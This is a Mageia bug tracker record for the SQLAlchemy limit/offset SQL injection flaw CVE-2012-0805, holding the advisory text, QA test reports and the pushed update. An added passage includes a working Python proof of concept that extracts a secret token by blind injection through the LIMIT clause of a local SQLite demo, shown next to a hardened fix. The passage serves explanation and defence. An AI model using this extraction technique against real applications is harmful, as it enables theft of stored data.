Bug 5268 - python-sqlalchemy new security issue CVE-2012-0805
Summary: python-sqlalchemy new security issue CVE-2012-0805
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 1
Hardware: i586 Linux
Priority: Normal
Severity: normal
Target Milestone: ---
Assignee: QA Team
QA Contact:
URL:
Whiteboard:
Keywords: validated_update
Depends on:
Blocks:
Reported: 2012-04-07 16:26 CEST by David Walser
Modified: 2012-04-11 22:04 CEST

See Also:
Source RPM: python-sqlalchemy-0.6.6-1.mga1.src.rpm
CVE:
Status comment:



Description David Walser 2012-04-07 16:26:28 CEST
Red Hat has issued this advisory on March 7:
https://rhn.redhat.com/errata/RHSA-2012-0369.html

Cauldron is not vulnerable.

It looks like this, and many other bugs, can be fixed by upgrading to 0.6.8.

More info here:
https://bugzilla.redhat.com/show_bug.cgi?id=783305
David Walser 2012-04-07 16:26:47 CEST

CC: (none) => makowski.mageia

Philippe Makowski 2012-04-09 11:01:40 CEST

Assignee: bugsquad => makowski.mageia

Comment 1 Philippe Makowski 2012-04-09 17:07:41 CEST
python-sqlalchemy-0.6.8-1.mga1 is in 1/core/updates_testing

Status: NEW => ASSIGNED

Comment 2 David Walser 2012-04-09 17:13:51 CEST
Thanks Philippe.

Advisory:
========================

Updated python-sqlalchemy package fixes security vulnerability:

It was discovered that SQLAlchemy did not sanitize values for the limit
and offset keywords for SQL select statements. If an application using
SQLAlchemy accepted values for these keywords, and did not filter or
sanitize them before passing them to SQLAlchemy, it could allow an attacker
to perform an SQL injection attack against the application (CVE-2012-0805).

python-sqlalchemy has been updated to version 0.6.8 which fixes this
vulnerability as well as several other bugs.

Note: All running applications using SQLAlchemy must be restarted
for this update to take effect.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0805
https://rhn.redhat.com/errata/RHSA-2012-0369.html
========================

Updated packages in core/updates_testing:
========================
python-sqlalchemy-0.6.8-1.mga1.i586.rpm

from python-sqlalchemy-0.6.8-1.mga1.src.rpm

Assignee: makowski.mageia => qa-bugs

Comment 3 Dave Hodgins 2012-04-10 22:05:14 CEST
Testing complete on i586 for the srpm
python-sqlalchemy-0.6.8-1.mga1.src.rpm

Tested using gourmet as per
https://bugs.mageia.org/show_bug.cgi?id=1738#c5

CC: (none) => davidwhodgins

Comment 4 Manuel Hiebel 2012-04-11 02:37:28 CEST
Testing complete on x86_64


Suggested Advisory:
-------------
Updated python-sqlalchemy package fixes security vulnerability:

It was discovered that SQLAlchemy did not sanitize values for the limit
and offset keywords for SQL select statements. If an application using
SQLAlchemy accepted values for these keywords, and did not filter or
sanitize them before passing them to SQLAlchemy, it could allow an attacker
to perform an SQL injection attack against the application (CVE-2012-0805).

python-sqlalchemy has been updated to version 0.6.8 which fixes this
vulnerability as well as several other bugs.

Note: All running applications using SQLAlchemy must be restarted
for this update to take effect.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0805
https://rhn.redhat.com/errata/RHSA-2012-0369.html

https://bugs.mageia.org/show_bug.cgi?id=5268
-------------

SRPM: python-sqlalchemy-0.6.8-1.mga1.src.rpm

Could sysadmin please push from core/updates_testing to core/updates

Thank you!

Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs
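The advisory text in Comment 2 and Comment 4 describes the bug class but not what the injection looks like. The following is an added Python example, written for this page; it is not code from this bug report and not SQLAlchemy's own code. It uses the standard-library sqlite3 module to mimic the unsafe pattern the advisory describes (limit/offset rendered into the SQL text as strings) next to a hardened version that coerces the values to int and binds them. The int() coercion is my reading of what the 0.6.8 fix does, stated here as an assumption; the tables, rows and the `list_users_*`/`steal_token` functions are constructed for the demonstration.

```python
import sqlite3

# Constructed sample schema: a table the application paginates over and a
# table the attacker should never be able to read.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users (name) VALUES ('alice'), ('bob'), ('carol'), ('dave');
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO secrets (token) VALUES ('s3cr3t');
    """)
    return conn


def list_users_vulnerable(conn, limit, offset):
    # Mimics the pre-0.6.8 behaviour described in the advisory: whatever the
    # caller passed as limit/offset is rendered straight into the SQL text.
    sql = "SELECT name FROM users ORDER BY id LIMIT %s OFFSET %s" % (
        str(limit), str(offset))
    return [row[0] for row in conn.execute(sql)]


def list_users_fixed(conn, limit, offset):
    # Hardened form (assumed to match the spirit of the 0.6.8 fix): coerce to
    # int first, so a payload string raises ValueError before any SQL is built,
    # then hand the integers to the driver as bind parameters.
    limit, offset = int(limit), int(offset)
    if limit < 0 or offset < 0:
        raise ValueError("limit/offset must be non-negative")
    sql = "SELECT name FROM users ORDER BY id LIMIT ? OFFSET ?"
    return [row[0] for row in conn.execute(sql, (limit, offset))]


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def steal_token(conn, query_fn):
    # Blind extraction through the LIMIT position. SQLite accepts an arbitrary
    # expression after LIMIT, including a scalar subquery, so the number of
    # rows returned (1 or 0) becomes a yes/no oracle on the secret's prefix.
    token = ""
    while True:
        for ch in ALPHABET:
            guess = token + ch
            payload = (
                "(SELECT CASE WHEN substr(token,1,%d)='%s' THEN 1 ELSE 0 END "
                "FROM secrets)" % (len(guess), guess))
            if len(query_fn(conn, payload, 0)) == 1:
                token = guess
                break
        else:
            # No character extended the prefix: the whole token is recovered.
            return token


if __name__ == "__main__":
    db = make_db()
    print("page 2 (vulnerable):", list_users_vulnerable(db, 2, 1))
    print("leaked via LIMIT injection:", steal_token(db, list_users_vulnerable))
    try:
        steal_token(db, list_users_fixed)
    except ValueError as exc:
        print("fixed version rejected payload:", exc)
```

The attack needs no statement separator and no UNION, which is why "the limit is just a number at the end of the query" is not a safe assumption: any database that evaluates an expression in that position turns an unchecked limit into a boolean oracle. The fix is the same whether or not the ORM is in the path: validate the type before the SQL is rendered, and bind the value rather than format it in.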

Comment 5 Thomas Backlund 2012-04-11 22:04:05 CEST
Update pushed

Status: ASSIGNED => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED

